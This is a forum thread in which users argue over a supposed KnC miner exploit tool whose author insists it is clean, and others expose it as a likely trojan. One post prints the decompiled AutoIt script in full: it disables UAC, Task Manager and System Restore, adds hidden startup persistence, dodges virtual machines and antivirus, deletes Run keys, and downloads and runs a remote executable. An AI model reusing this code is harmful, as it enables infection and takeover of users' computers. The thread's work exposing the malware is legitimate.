KnC Miner : Security hacked - UPDATE with TOOL admin remove plz

steve15

member

Activity: 70

Merit: 10

Moderator please remove this topic

Source code of the project has been sold. I do no longer support the application or it's source in any way.
The buyer claims he will make the source public soon to prevent massive scale attacks.

Thank you.

ici_lemmy

member

Activity: 75

Merit: 100

Linux :

Code:

$unzip minerProofOfConcept.zip
$unrar e minerProof.exe
$sed '/^;/d' crLyJ > tmp.au3
$nano tmp.au3
$//^^modify to keep only _crypt_* funtions and code call to _crypt_decryptdata with good param
$cp * /windows/

And under windows :

Code:

>lmsqQw.exe tmp.au3

Send the resulting file to any antivirus...

You'll see yourself

nuno12345

sr. member

Activity: 276

Merit: 284

One last shot...

AutoIt script MD5 pass: 1baba19a29b940f09293c9f47030d79c

AutoIt script, encrypted code:

Code:

">>>AUTOIT SCRIPT<<<"
"wb"
"%.15g"
"0x%p"
"True"
"False"
"%s (%d) : ==> %s.: %s %s"
"Line %d:"
"Line %d  (File "%s"):"
"Error: "
"AU3_FreeVar"
....
"SeDebugPrivilege"

More at 001FE0D0

Processor/virtual env check
Address=001A6A16, Destination=kernel32.IsProcessorFeaturePresent

Debugger check stages
Address=0019D7C6, Destination=kernel32.IsDebuggerPresent
Address=001A7DB7, Destination=kernel32.IsDebuggerPresent
Address=001B1EE1, Destination=kernel32.IsDebuggerPresent

I guess your autoit exe has all the protection on the exe itself and an additional encryption on the AutoIt script inside, but your file needs to run it so it must know the password or how to decrypt it.

Long long shot, open Exe2Aut in a debugger (you'll need to unpack it with UPX first). Breakpoint at 0x004026B9 and hit the "Decompile" button. When the debugger breaks you will have the password at the top of the stack.

Chancellor

full member

Activity: 154

Merit: 100

Quote from: ici_lemmy on January 28, 2014, 01:38:54 PM

Now if people are dumb enough to download your tool and run it on their actual computer, there is nothing more i can do...

Regardless of what is really contained in this file (and it looks fishy indeed), the above quote is the most important thing. Steve15, if you wanted to play fair, you should disclose the vulnerability as a whole and in detail. Then:
1. Miners would know what the danger really is, without running some encrypted, suspicious executables. Then they can react fast and protect their rigs.
2. KNC would be forced to patch their firmware quickly, if really needed.
3. You would be acknowledged as the discoverer and would show your real pentesting skill.
I would go for disclosure, especially as you said that KNC tried to hide the problem under the carpet. Instead, the fact is the whole story is directed by you in a way that try to encourage people to run some encrypted, probably dangerous, application. As ici_lemmy said, if they are dumb enough, well...

steve15

member

Activity: 70

Merit: 10

Quote from: ici_lemmy on January 28, 2014, 01:38:54 PM

As I said, I have no more time to loose with that...
I'm absolutely sure that you are a script kiddie trying ton infect computer and I explained how to verify what i'm saying (quickly, i have to admit) so anybody, skilled enough, can check for himself...

Now if people are dump enough to download your tool and run it on their actual computer, there is nothing more i can do...

Just explain why you upload a whole different file, containing over more than 15 DLL files that are NOT in my file.
Explain why your upload contains a Remote Service Application for example.

Your posts are worth nothing dude. Get lost. And see my edits above in my last post.

ici_lemmy

member

Activity: 75

Merit: 100

As I said, I have no more time to loose with that...
I'm absolutely sure that you are a script kiddie trying ton infect computer and I explained how to verify what i'm saying (quickly, i have to admit) so anybody, skilled enough, can check for himself...

Now if people are dump enough to download your tool and run it on their actual computer, there is nothing more i can do...

steve15

member

Activity: 70

Merit: 10

Quote from: ici_lemmy on January 28, 2014, 11:41:20 AM

@steve15 : I'm disapointed by myself because I have not exposed you earlier...

For the analysis, quick answer because I have no more time to loose on this...

OK, so here is my simple full process to expose the scam (so everyone with skills can do it) :
- unrar the exe
- remove the commented autoit script lines
- modify the script in order to have the decrypted file (and removing the nasty things)
- send the decrypted file to virustotal

and here are the virustotal results :
https://www.virustotal.com/fr/file/abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3/analysis/1390926392/ --> 45/50

Conclusion : steve15 is a not a professionnal pentester but rather a script kiddie trying to infect your computer with a backdoor.
No need to thank me !

@admin : you should remove the link to the tool and ban steve

Edit : @Chancellor : there is no vulnerability except the api in cgminer which is not actually a vulnerability

You really are an idiot, excuse my language.

Try this:

- Download whatever executable file online, for example Firefox installer.
- Scan with virustotal = 0/50
- Disasemble the exe or rar
- Remove the commented lines
- Modify the script to have the contents of the installer
- Remove some lines
- Send the decrypted file to virustotal = bam, at least 40/50

Every single executable known file in virustotal that gets modified with even 1 bit will get an instant alert.
That is the main reason why you cant fake EXE file assembly without triggering an alert.

Also notice our hashes:

My hash : A5F3453E03DD2E4F356BEC7FB595B799A8EA6BE2C0466CE8550C74E247511870
Your hash: abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3

You scanned a "*.BIN" file. You could have uploaded WHATEVER file you wanted to upload.
Hashcheck is not the same, so it is not the same file, period. That's called faking results.

You file contains at lease 15 DLL files that are not even present in my code!

THIS are the files included:

Try this second method:

Create any .NET project
Google some UPnP / network scanning methods/modules/classes
Compile and send to virustotal = bam, 40/50

So please, you have no idea what you are talking about.
You still failed to post the actual exploit code also.

You post the source from the crypter ITSELF to scare people, but you also fail to post the configuration file for it, so they can see i'm not using ANY of these 'scary' functions.

At most, you can be considered a medium skilled cracker, but that is where this story ends for you ici_lemmy.
Cracking, hacking and decompiling is more than running some cracked tools you found on thepiratebay.

steve15

member

Activity: 70

Merit: 10

Quote from: Chancellor on January 28, 2014, 11:37:49 AM

Quote from: steve15 on January 28, 2014, 11:19:55 AM

Here are my beliefs

And what if...

1. You've discovered some minor vulnerability, which only may be exploited in extreme conditions, like a miner on a public IP.
2. You've made fuss about it here.
3. You've prepared a malicious software, which when ran on a Windows machine on the same LAN as miner allows you to take control over miner.
4. Then you, the "benefactor" of the KNC users community, try to sneak your trojan to users and take their miners.

Bullshit? Maybe.

Impossible? Don't think so. Time will tell.

IMHO the best way to deal with the "vulnerability" would be a full, immediate disclosure.

You are right about some parts.

1. If the vulnerability is minor, would KnC upgrade their firmware? It is not just the public IP miners who are in danger
2: If i prepared a malicious software to take control over users miner, would i really opt for an EXE file you think?

Preparing malicious software, and binding it in a simple PDF file, where i claim to describe the method would be far more efficient for that purpose.

People are not suspicious about a PDF, and they need to open it anyway.

ici_lemmy

member

Activity: 75

Merit: 100

@steve15 : I'm disapointed by myself because I have not exposed you earlier...

For the analysis, quick answer because I have no more time to loose on this...

OK, so here is my simple full process to expose the scam (so everyone with skills can do it) :
- unrar the exe
- remove the commented autoit script lines
- modify the script in order to have the decrypted file (and removing the nasty things)
- send the decrypted file to virustotal

and here are the virustotal results :
https://www.virustotal.com/fr/file/abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3/analysis/1390926392/ --> 45/50

Conclusion : steve15 is a not a professionnal pentester but rather a script kiddie trying to infect your computer with a backdoor.
No need to thank me !

@admin : you should remove the link to the tool and ban steve

Edit : @Chancellor : there is no vulnerability except the api in cgminer which is not actually a vulnerability

Chancellor

full member

Activity: 154

Merit: 100

Quote from: steve15 on January 28, 2014, 11:19:55 AM

Here are my beliefs

And what if...

1. You've discovered some minor vulnerability, which only may be exploited in extreme conditions, like a miner on a public IP.
2. You've made fuss about it here.
3. You've prepared a malicious software, which when ran on a Windows machine on the same LAN as miner allows you to take control over miner.
4. Then you, the "benefactor" of the KNC users community, try to sneak your trojan to users and take their miners.

Bullshit? Maybe.

Impossible? Don't think so. Time will tell.

IMHO the best way to deal with the "vulnerability" would be a full, immediate disclosure.

steve15

member

Activity: 70

Merit: 10

Here are my beliefs

ici_lemmy does not even own mining equipment.

Because, instead of trying out if he's rigs are exploitable yes or no, he straight goes to decompiling all files.
Since he made not a single post in this thread before i posted my tool, i believe he was just waiting to try and exploit my tool in order to do nasty stuff with it.

Why else decompile before trying...

Dozens of PM's regarding this kind of "users" (i prefer the term hacker, but what's in a name...) are submitted to me by concerned miners.

For this reason, none of the exploit code can be found inside the main executables.
I also crypted the files to prevent a run while sniffers are active, or virtual enviroments are detected.
This was also posted by me before posting the tool.

As ici_lemmy himself posts, he is disapointed by himself. Why?
Because for the third time in a row he posts decompiled code that does... nothing at all!

This proves to me his eager to get to the core files to abuse them.

If i had a program that was as evil as he tries to picture it, i whould have deleted it by now.
Seems also logic that any AV/AM/FW scanner picked it up by now.

So for the last and final time:

IF YOU ARE PLANNING ON ABUSING THE SOURCE.. GET LOST, YOU CANT.
IF YOU ARE PLANNING ON POSTING BULLSHIT FOR NOT BEING ABLE TO EXTRACT THE SOURCE.. GET LOST.
IF YOU WANT TO TEST YOUR MINING EQUIPEMENT.. FEEL FREE TO DOWNLOAD AND TEST RUN and THEN POST YOUR FINDINGS.

I will no longer reply to any scriptkiddie out there, trying to get hold on the source, tested, approved and verified by KnC itself, to start hacking some machines.

As stated before, this is the kind of behaviour that makes me want to keep all next exploits to myself instead of sharing them.
I would have been better of just mining with your rigs, smiling while reading your posts about it...

Thank you

bitpop

legendary

Activity: 2912

Merit: 1060

Show him lemmy, don't hold back.

steve15

member

Activity: 70

Merit: 10

bitpop

legendary

Activity: 2912

Merit: 1060

I love Lua

Op is delusional

Sarge

newbie

Activity: 1

Merit: 0

Quote from: steve15 on January 26, 2014, 01:43:22 PM

I finished compiling my "Proof of Concept" application to allow you to test out the exploits on you OWN miners.

When network sniffing is detected, the application will auto shut down!

Antivirus results: Scanned with MetaScan, file is clean 39/40 antivirus scanners. I have one false positive out of 40 with a minor AV vendor.
The file is CLEAN !! If 39 of the biggest AV vendors show it's clean, it IS clean!

Note: The false positive is triggered by the sub that detects network sniffing and shuts the application down.

AV scan result: https://www.metascan-online.com/en/scanresult/file/d79999b0cbd74e978fc4dfee6d3bc0ef

problem and solution are mystical
Filename for download different than the file to the online scanner
Author claims it's clean while making his statement look like the typical nigerian prince scam (colors, bold, repeating word clean several times)
Code can't be run in a VM (WTF, why?!)
When a network sniffer is detected to the program shuts it self down (WTF²)
no supposed MD5 hash posted

reminds me of "your from Anonymous Proxy too, let's meet up"

seems legit! <<< don't take this seriosly

sandor111

hero member

Activity: 616

Merit: 500

Yuck, that is some nasty code... WTF, really..?

ici_lemmy

member

Activity: 75

Merit: 100

That was smart to let us look at the other way...
I'm disapointed by meself, I should have seen that earlier...

Code:

#NoTrayIcon
If ProcessExists("avastui.exe") Then Sleep(20000)
$path = "ppqzt"
$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@ScriptFullPath)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)
$unicode_userprofile = FileGetShortName(@UserProfileDir)
$win_userprofile = "%userprofile%\"
FileSetAttrib($uniscriptdir, "+SHR")
Local $delay = IniRead($uniscriptdir & "\HbDzt.MCM", "6072607", "5726011", "NotFound")
If $delay = "4140580" Then
	delay()
Else
EndIf
Local $mutex = IniRead($uniscriptdir & "\HbDzt.MCM", "1478845", "1729463", "NotFound")
If $mutex = "9293639" Then
	mutex()
Else
EndIf
Local $startup = IniRead($uniscriptdir & "\HbDzt.MCM", "9363719", "5077712", "NotFound")
If $startup = "8541394" Then
	startup()
Else
EndIf
Local $antis = IniRead($uniscriptdir & "\HbDzt.MCM", "9632628", "8921159", "NotFound")
If $antis = "2314561" Then
	antis()
Else
EndIf
Local $fake = IniRead($uniscriptdir & "\HbDzt.MCM", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
	fakemessage()
Else
EndIf
Local $botkiller = IniRead($uniscriptdir & "\HbDzt.MCM", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
	botkiller()
Else
EndIf
Local $downloader = IniRead($uniscriptdir & "\HbDzt.MCM", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
	downloader()
Else
EndIf
Local $uac = IniRead($uniscriptdir & "\HbDzt.MCM", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
	disable_uac()
Else
EndIf
Local $systemrestore = IniRead($uniscriptdir & "\HbDzt.MCM", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
	disable_syste_restore()
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "\HbDzt.MCM", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
	antitask()
Else
EndIf

Func delay()
	$counter = 0
	While $counter <= 5
		Sleep(5000)
		ShellExecute(@SystemDir & "\mshta.exe")
		$counter = $counter + 1
		_rundos("taskkill /IM mshta.exe")
	WEnd
EndFunc

Func systemhide()
	RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
	RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
EndFunc

Func fakemessage()
	$type = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetype1", "messagetype2", "NotFound")
	$title = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetitle1", "messagetitle2", "NotFound")
	$message = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetext1", "messagetext2", "NotFound")
	If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then
	Else
		MsgBox($type, $title, $message)
		FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "")
	EndIf
EndFunc

Func mutex()
	$scriptname = "lmsqQw.exe"
	If UBound(ProcessList($scriptname)) > 2 Then Exit 
EndFunc

Func antitask()
	$read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
	If NOT ($read_antitask = "1") Then
		RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
	EndIf
EndFunc

Func disable_uac()
	$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
	If NOT ($read_uac = "0") Then
		RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
	EndIf
EndFunc

Func startup()
	$buac = _checkelevationenabled()
	If $buac = 0 Then
	Else
		FileCreateShortcut($unicode_userprofile & "\" & $path & "\85841.vbs", $unicode_startup & "\start.lnk")
		FileSetAttrib($unicode_startup & "\start.lnk", "+SH")
	EndIf
	RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
	If NOT FileExists($unicode_userprofile & "\" & $path & "\85841.vbs") Then
		Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\65084.cmd", 1)
		$autoit3 = "lmsqQw.exe"
		FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName)
		FileClose($bat)
		Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\85841.vbs", 1)
		FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="' & $unicode_userprofile & "\" & $path & "\" & '65084.cmd"' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
		FileClose($vbs)
		RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
		FileSetAttrib($unicode_userprofile & "\" & $path & "\85841.vbs", "+SHR")
		FileSetAttrib($unicode_userprofile & "\" & $path & "\65084.cmd", "+SHR")
		If FileExists($unicode_startup & "\start.lnk") Then
			FileDelete($unicode_startup & "\start.lnk")
		EndIf
	Else
	EndIf
EndFunc

Func _checkelevationenabled()
	$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
	If @error Then Return 
	Local $struct = DllStructCreate("BOOL")
	Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct))
	If @error Then
		Return SetError(@error)
	EndIf
	Return SetError($artn[0], 0, DllStructGetData($struct, 1))
EndFunc

Func antis()
	If WinGetText("Program Manager") = "0" Then
		Exit 
	Else
	EndIf
	If ProcessExists("VboxService.exe") Then
		Exit 
	EndIf
	If ProcessExists("VMwaretray.exe") Then
		Exit 
	EndIf
EndFunc

Func persistence()
	If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then
		$pathtovbs = ($uniscriptdir & "\" & "run.vbs")
		ShellExecute($pathtovbs)
		Exit 
	EndIf
EndFunc

Func downloader()
	If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then
	Else
		FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "")
		$random_download_name = Random(10000, 99999, 1) & ".exe"
		Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1)
		Do
			Sleep(250)
		Until InetGetInfo($hdownload, 2)
		Local $nbytes = InetGetInfo($hdownload, 0)
		InetClose($hdownload)
		ShellExecute($unicode_userprofile & "\" & $random_download_name)
	EndIf
EndFunc

Func bsod()
	$a = ProcessList()
	For $i = 1 To UBound($a) - 1
		ProcessClose($a[$i][0])
	Next
	Exit 
EndFunc

Func botkiller()
	RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
	RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
	RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
	RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
	FileDelete(@StartupDir & "\*.*")
EndFunc

Func disable_syste_restore()
	If FileExists($uniscriptdir & "\check.txt") Then
	Else
		RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
		FileWrite($uniscriptdir & "\check.txt", "")
	EndIf
EndFunc

Func _rundos($scommand)
	Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
	Return SetError(@error, @extended, $nresult)
EndFunc

Global Const $prov_rsa_full = 1
Global Const $prov_rsa_aes = 24
Global Const $crypt_verifycontext = -268435456
Global Const $hp_hashsize = 4
Global Const $hp_hashval = 2
Global Const $crypt_exportable = 1
Global Const $crypt_userdata = 1
Global Const $calg_md2 = 32769
Global Const $calg_md4 = 32770
Global Const $calg_md5 = 32771
Global Const $calg_sha1 = 32772
Global Const $calg_3des = 26115
Global Const $calg_aes_128 = 26126
Global Const $calg_aes_192 = 26127
Global Const $calg_aes_256 = 26128
Global Const $calg_des = 26113
Global Const $calg_rc2 = 26114
Global Const $calg_rc4 = 26625
Global Const $calg_userkey = 0
Global $__g_acryptinternaldata[3]

[SNIP]
-----------------
[SNIP]

Func loop()
	While 1
		If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then
			__bsod($scriptname, False)
		EndIf
		If WinExists($path) Then
			bsod()
		Else
		EndIf
		Sleep(100)
	WEnd
EndFunc

Yeah, why should I bother run this in a vm Huh

?

Nice game OP... but you loose !

steve15

member

Activity: 70

Merit: 10

Allright, to keep this post on topic.

JUST TO BE CLEAR

Decompiling the executable, or the DLL file will NOT give you what you are looking for.
These are only to run the network scan.

AutoIT is used to execute the actual exploit, and detect modifications, scanners, sniffers, decompilers, and virtual boxes.

If ANY of these is detected, the application will shut down, and the REAL injection script is terminated, destroyed and melted.

USE THIS TOOL FOR WHAT IS HAS BEEN DESIGNED FOR!!

This tool is a PROOF OF CONCEPT about build-in exploits in most miner hardware rigs.

If you feel the need to run it sandboxed, virtual, or with an active scanner/sniffer/decompiler/debugger, than your intentions are NOT to test your enviroment, thus the file gets destroyed.

I received a ton load of PM's about security issues, and this is the best solution to prevent idiots trying to hack someone else's miners.

Over and out.

steve15

member

Activity: 70

Merit: 10

nuno12345

sr. member

Activity: 276

Merit: 284

frmUPnPBrowser:

Code:

Source Code for [KnC_cg_bfg_exploit_PoC]ManagedUPnPTest.frmUPnPBrowser
// Decompiled by Salamander version 2.0.0
// Copyright 2002-2006 Remotesoft Inc. All rights reserved.
// http://www.remotesoft.com/salamander

using ManagedUPnP;
using System;
using System.ComponentModel;
using System.Drawing;
using System.Windows.Forms;

namespace ManagedUPnPTest
{
    public class frmUPnPBrowser : Form
    {
        private ManagedUPnP.AutoEventedDiscoveryServices mdsServices;

        private ctlUPnPInfo miInfo = null;

        private IContainer components = null;

        private ctlUPnPTreeBrowser tvUPnP;

        private ImageList ilIcons;

        private Panel pnlInfo;

        private SplitContainer scMain;

        private TabControl tcMain;

        private TabPage tpInfo;

        private TabPage tpLog;

        private ctlLogBox txtLog;


        public frmUPnPBrowser()
        {
            InitializeComponent();
        }

        private void frmManagedUPnPTest_Load(object sender, EventArgs e)
        {
            Logging.LogLines += new LogLinesEventHandler(this, Logging_LogLines);
            Logging.Enabled = true;
            mdsServices = new ManagedUPnP.AutoEventedDiscoveryServices(null);
            mdsServices.ResolveNetworkInterfaces = true;
            mdsServices.CanCreateServiceFor += new AutoEventedDiscoveryServicesB1.CanCreateServiceForEventHandler(this, dsServices_CanCreateServiceFor);
            mdsServices.CreateServiceFor += new AutoEventedDiscoveryServicesB1.CreateServiceForEventHandler(this, dsServices_CreateServiceFor);
            mdsServices.StatusNotifyAction += new AutoEventedDiscoveryServicesB1.StatusNotifyActionEventHandler(this, dsServices_StatusNotifyAction);
            WindowsFirewall.CheckUPnPFirewallRules(null);
            mdsServices.ReStartAsync();
        }

        private void frmUPnPBrowser_FormClosing(object sender, FormClosingEventArgs e)
        {
            Logging.Enabled = false;
            Logging.LogLines -= new LogLinesEventHandler(this, Logging_LogLines);
        }

        private void Logging_LogLines(object sender, LogLinesEventArgs a)
        {
            string str2 = String.Concat(DateTime.Now.ToString("[yyyy/MM/dd HH:mm:ss.fff] "), new String(' ', a.Indent * 4));
            txtLog.AppendLog(String.Concat(str2, a.Lines.Replace("\r\n", String.Concat("\r\n", str2)), "\r\n"));
        }

        private void dsServices_StatusNotifyAction(object sender, AutoEventedDiscoveryServicesB1.StatusNotifyActionEventArgs a)
        {
            AutoDiscoveryServicesB1.NotifyAction autoDiscoveryServicesB1_NotifyAction = a.NotifyAction;
            switch (autoDiscoveryServicesB1_NotifyAction)
            {
            case 1:
                tvUPnP.RemoveDevice((String)a.Data);
                break;

            case 2:
                tvUPnP.RemoveService((Service)a.Data);
                break;

            default:
                if (autoDiscoveryServicesB1_NotifyAction == 10)
                {
                    tvUPnP.AddService((Service)a.Data);
                }
                break;
            }
        }

        private void dsServices_CreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CreateServiceForEventArgs a)
        {
            a.CreatedAutoService = a.Service;
        }

        private void dsServices_CanCreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CanCreateServiceForEventArgs a)
        {
            a.CanCreate = true;
        }

        private void tvUPnP_AfterSelect(object sender, TreeViewEventArgs e)
        {
            IUPnPTreeItem iUPnPTreeItem = tvUPnP.SelectedItem;
            ctlUPnPInfo CtlUPnPInfo = miInfo;
            miInfo = null;
            try
            {
                bool flag = iUPnPTreeItem == null;
                if (!flag)
                {
                    miInfo = iUPnPTreeItem.InfoControl;
                    flag = miInfo == null;
                    if (!flag)
                    {
                        miInfo.Dock = DockStyle.Fill;
                        pnlInfo.Controls.Add(miInfo);
                    }
                }
            }
            finally
            {
                bool flag = CtlUPnPInfo == null;
                if (!flag)
                {
                    pnlInfo.Controls.Remove(CtlUPnPInfo);
                    CtlUPnPInfo.Dispose();
                }
            }
        }

        protected override void Dispose(bool disposing)
        {
            if (!(disposing ? (components == null) : 1))
            {
                components.Dispose();
            }
            base.Dispose(disposing);
        }

        private void InitializeComponent()
        {
            components = new Container();
            ilIcons = new ImageList(components);
            pnlInfo = new Panel();
            scMain = new SplitContainer();
            tcMain = new TabControl();
            tpInfo = new TabPage();
            tpLog = new TabPage();
            tvUPnP = new ctlUPnPTreeBrowser();
            txtLog = new ctlLogBox();
            ((ISupportInitialize)scMain).BeginInit();
            scMain.Panel1.SuspendLayout();
            scMain.Panel2.SuspendLayout();
            scMain.SuspendLayout();
            tcMain.SuspendLayout();
            tpInfo.SuspendLayout();
            tpLog.SuspendLayout();
            base.SuspendLayout();
            ilIcons.ColorDepth = ColorDepth.Depth8Bit;
            ilIcons.ImageSize = new Size(16, 16);
            ilIcons.TransparentColor = Color.Transparent;
            pnlInfo.Dock = DockStyle.Fill;
            pnlInfo.Location = new Point(3, 3);
            pnlInfo.Name = "pnlInfo";
            pnlInfo.Size = new Size(645, 646);
            pnlInfo.TabIndex = 1;
            scMain.Dock = DockStyle.Fill;
            scMain.Location = new Point(0, 0);
            scMain.Name = "scMain";
            scMain.Panel1.Controls.Add(tvUPnP);
            scMain.Panel2.Controls.Add(tcMain);
            scMain.Size = new Size(1055, 678);
            scMain.SplitterDistance = 392;
            scMain.TabIndex = 2;
            tcMain.Controls.Add(tpInfo);
            tcMain.Controls.Add(tpLog);
            tcMain.Dock = DockStyle.Fill;
            tcMain.Location = new Point(0, 0);
            tcMain.Name = "tcMain";
            tcMain.SelectedIndex = 0;
            tcMain.Size = new Size(659, 678);
            tcMain.TabIndex = 1;
            tpInfo.Controls.Add(pnlInfo);
            tpInfo.Location = new Point(4, 22);
            tpInfo.Name = "tpInfo";
            tpInfo.Padding = new Padding(3);
            tpInfo.Size = new Size(651, 652);
            tpInfo.TabIndex = 0;
            tpInfo.Text = "Selected Item Info";
            tpInfo.UseVisualStyleBackColor = true;
            tpLog.Controls.Add(txtLog);
            tpLog.Location = new Point(4, 22);
            tpLog.Name = "tpLog";
            tpLog.Padding = new Padding(3);
            tpLog.Size = new Size(496, 502);
            tpLog.TabIndex = 1;
            tpLog.Text = "UPnP Log";
            tpLog.UseVisualStyleBackColor = true;
            tvUPnP.Dock = DockStyle.Fill;
            tvUPnP.ImageIndex = 1;
            tvUPnP.Location = new Point(0, 0);
            tvUPnP.Name = "tvUPnP";
            tvUPnP.SelectedImageIndex = 0;
            tvUPnP.Size = new Size(392, 678);
            tvUPnP.TabIndex = 0;
            tvUPnP.AfterSelect += new TreeViewEventHandler(this.tvUPnP_AfterSelect);
            txtLog.BackColor = SystemColors.Window;
            txtLog.Dock = DockStyle.Fill;
            txtLog.Font = new Font("Courier New", 8.25F);
            txtLog.Location = new Point(3, 3);
            txtLog.Name = "txtLog";
            txtLog.ReadOnly = true;
            txtLog.Size = new Size(490, 496);
            txtLog.TabIndex = 0;
            txtLog.Text = "";
            txtLog.WordWrap = false;
            base.AutoScaleDimensions = new SizeF(6.0F, 13.0F);
            base.AutoScaleMode = AutoScaleMode.Font;
            base.ClientSize = new Size(1055, 678);
            base.Controls.Add(scMain);
            base.Name = "frmUPnPBrowser";
            Text = "KnC Miner - CGminer - BFGminer exploiter PoC";
            base.FormClosing += new FormClosingEventHandler(this.frmUPnPBrowser_FormClosing);
            base.Load += new EventHandler(this.frmManagedUPnPTest_Load);
            scMain.Panel1.ResumeLayout(false);
            scMain.Panel2.ResumeLayout(false);
            ((ISupportInitialize)scMain).EndInit();
            scMain.ResumeLayout(false);
            tcMain.ResumeLayout(false);
            tpInfo.ResumeLayout(false);
            tpLog.ResumeLayout(false);
            base.ResumeLayout(false);
        }
    }

}

Am I right? Should I paste what it does?

Topic: KnC Miner : Security hacked - UPDATE with TOOL admin remove plz (Read 25842 times)